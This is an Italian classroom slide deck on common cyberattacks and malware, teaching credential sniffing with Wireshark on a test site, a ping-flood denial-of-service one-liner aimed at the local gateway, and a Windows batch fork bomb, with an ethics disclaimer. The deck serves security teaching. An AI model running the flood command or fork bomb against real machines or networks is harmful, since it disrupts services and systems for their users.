## **MALWARE & ATTACKS**

Attacchi informatici e Malware più diffusi

#### Fonti:

- Wikipedia
- NOME FONTE 2



### **ATTENZIONE**

#### **ATTENZIONE**

Le seguenti slide contengono materiale potenzialmente pericoloso, fornito **esclusivamente a scopo didattico** per l'apprendimento delle tecniche di sicurezza informatica. Questi strumenti devono essere utilizzati **in modo etico e responsabile**, esclusivamente per scopi legittimi come il miglioramento della sicurezza e la protezione dei sistemi.

È vietato utilizzare queste informazioni per attività malevoli o illegali. Ogni uso improprio che violi le leggi o i principi etici è severamente sanzionato dalla legge.

**ATTACCHI INFORMATICI** 

### SNIFFIG DI RETE

#### **DEFINIZIONE**

Attività di **intercettazione passiva dei dati** che transitano in una rete telematica: può essere svolta sia per scopi legittimi (ad esempio l'analisi e l'individuazione di problemi di comunicazione o di tentativi di intrusione) sia per scopi illeciti contro la sicurezza informatica (intercettazione fraudolenta di password o altre informazioni sensibili). I prodotti software utilizzati per eseguire queste attività vengono detti **Sniffer**.

- 1. Iniziare la registrazione dei pacchetti tramite Wireshark
- Collegarsi al sito: http://testphp.vulnweb.com
- 3. Effettuare il login tramite protocollo non cifrato HTTP (non sicuro)
- Ricercare nei pacchetti trasmessi un pacchetto HTTP POST (invio di dati)
- 5. Leggere l'username e la password in chiaro



Figura 1: creata con ChatGPT

- 1. Iniziare la registrazione dei pacchetti tramite Wireshark
- Collegarsi al sito: http://testphp.vulnweb.com
- 3. Effettuare il login tramite protocollo non cifrato HTTP (non sicuro)
- Ricercare nei pacchetti trasmessi un pacchetto HTTP POST (invio di dati)
- 5. Leggere l'username e la password in chiaro



Figura 1: creata con ChatGPT

- 1. Iniziare la registrazione dei pacchetti tramite Wireshark
- Collegarsi al sito: http://testphp.vulnweb.com
- 3. Effettuare il login tramite protocollo non cifrato HTTP (non sicuro)
- Ricercare nei pacchetti trasmessi un pacchetto HTTP POST (invio di dati)
- 5. Leggere l'username e la password in chiaro



Figura 1: creata con ChatGPT

- 1. Iniziare la registrazione dei pacchetti tramite Wireshark
- Collegarsi al sito: http://testphp.vulnweb.com
- 3. Effettuare il login tramite protocollo non cifrato HTTP (non sicuro)
- 4. Ricercare nei pacchetti trasmessi un pacchetto HTTP POST (invio di dati)
- 5. Leggere l'username e la password in chiaro



Figura 1: creata con ChatGPT

- 1. Iniziare la registrazione dei pacchetti tramite Wireshark
- Collegarsi al sito: http://testphp.vulnweb.com
- 3. Effettuare il login tramite protocollo non cifrato HTTP (non sicuro)
- 4. Ricercare nei pacchetti trasmessi un pacchetto HTTP POST (invio di dati)
- Leggere l'username e la password in chiaro



Figura 1: creata con ChatGPT

## **DENIAL OF SERVICE (DoS)**

#### **DEFINIZIONE**

Attacco informatico in cui si fanno **esaurire le risorse di un sistema informatico** che fornisce un servizio ai client, ad esempio un sito web su un server web, fino a renderlo non più in grado di erogare il servizio ai client richiedenti.

In un attacco Distributed Denial of Service (**DDoS**), il traffico dei dati in entrata che inonda la vittima proviene da molte fonti diverse.

Video DDoS e Botnet

- 1. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 2. Trovare l'indirizzo IP del Gateway predefinito: ipconfig
- Eseguire un attacco DoS creando 20 terminali che inviano infiniti pacchetti di da in parallelo all'indirizzo IP del Gateway predefinito: for /L %i in (1,1,20) do start "" cmd /k "ping -t -l 65500 ip\_gateway";
- 4. Aprire il Task Manager e visualizzare l'attuale consumo di risorse
- 5. Terminare l'attacco: taskkill /F /IM cmd.exe

- 1. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 2. Trovare l'indirizzo IP del Gateway predefinito: ipconfig;
- Eseguire un attacco DoS creando 20 terminali che inviano infiniti pacchetti di da in parallelo all'indirizzo IP del Gateway predefinito: for /L %i in (1,1,20) do start "" cmd /k "ping -t -l 65500 ip\_gateway";
- 4. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 5. Terminare l'attacco: taskkill /F /IM cmd.exe

- 1. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 2. Trovare l'indirizzo IP del Gateway predefinito: ipconfig;
- 3. Eseguire un attacco DoS creando 20 terminali che inviano infiniti pacchetti di dati in parallelo all'indirizzo IP del Gateway predefinito:

```
for /L %i in (1,1,20) do start "" cmd /k "ping -t -I 65500 ip_gateway";
```

- 4. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 5. Terminare l'attacco: taskkill /F /IM cmd.exe;

- 1. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 2. Trovare l'indirizzo IP del Gateway predefinito: ipconfig;
- 3. Eseguire un attacco DoS creando 20 terminali che inviano infiniti pacchetti di dati in parallelo all'indirizzo IP del Gateway predefinito:
  - for /L %i in (1,1,20) do start "" cmd /k "ping -t -l 65500 ip\_gateway";
- 4. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 5. Terminare l'attacco: taskkill /F /IM cmd.exe

- 1. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- 2. Trovare l'indirizzo IP del Gateway predefinito: ipconfig;
- 3. Eseguire un attacco DoS creando 20 terminali che inviano infiniti pacchetti di dati in parallelo all'indirizzo IP del Gateway predefinito:

```
for /L %i in (1,1,20) do start "" cmd /k "ping -t -l 65500 ip_gateway";
```

- 4. Aprire il Task Manager e visualizzare l'attuale consumo di risorse;
- Terminare l'attacco: taskkill /F /IM cmd.exe;



### **RABBIT**

#### **DEFINIZIONE**

Tipo di malware che attacca le risorse del sistema duplicando in continuazione la propria immagine su disco, o attivando nuovi processi a partire dal proprio eseguibile, in modo da consumare tutte le risorse disponibili sul sistema in pochissimo tempo. Il nome si riferisce proprio alla prolificità di questo "infestante".

Esempio Fork Bomb

- 1. Creare un file di testo RABBIT.txt;
- 2. Inserire la Fork Bomb nel file digitando: start cmd /k echo BOMB | %0
- 3. Modificare l'estensione del file da .txt a .ba
- Preparare un teminale con l'istruzione: taskkill /F /IM cmd.exe per stoppare il malware;
- 5. Eseguire il file RABBIT.bat e terminarlo con il comando preparato sul terminale.

- 1. Creare un file di testo RABBIT.txt;
- 2. Inserire la Fork Bomb nel file digitando: start cmd /k echo BOMB | %0
- 3. Modificare l'estensione del file da .txt a .bat
- Preparare un teminale con l'istruzione: taskkill /F /IM cmd.exe per stoppare il malware;
- 5. Eseguire il file RABBIT.bat e terminarlo con il comando preparato sul terminale.

- 1. Creare un file di testo RABBIT.txt;
- 2. Inserire la Fork Bomb nel file digitando: start cmd /k echo BOMB | %0
- 3. Modificare l'estensione del file da .txt a .bat
- Preparare un teminale con l'istruzione: taskkill /F /IM cmd.exe per stoppare il malware;
- 5. Eseguire il file RABBIT.bat e terminarlo con il comando preparato sul terminale.

- 1. Creare un file di testo RABBIT.txt;
- 2. Inserire la Fork Bomb nel file digitando: start cmd /k echo BOMB | %0
- 3. Modificare l'estensione del file da .txt a .bat
- Preparare un teminale con l'istruzione: taskkill /F /IM cmd.exe per stoppare il malware;
- 5. Eseguire il file RABBIT.bat e terminarlo con il comando preparato sul terminale.

- 1. Creare un file di testo RABBIT.txt;
- 2. Inserire la Fork Bomb nel file digitando: start cmd /k echo BOMB | %0
- 3. Modificare l'estensione del file da .txt a .bat
- Preparare un teminale con l'istruzione: taskkill /F /IM cmd.exe per stoppare il malware;
- 5. Eseguire il file RABBIT.bat e terminarlo con il comando preparato sul terminale.

# EFFETTUA UNA RICERCA SUI SEGUENTI MALWARE

(definizione e un esempio per ogni tipologia)

- BACKDOOR;
- RANSOMWARE;
- TROJAN;
- VIRUS;
- WORM.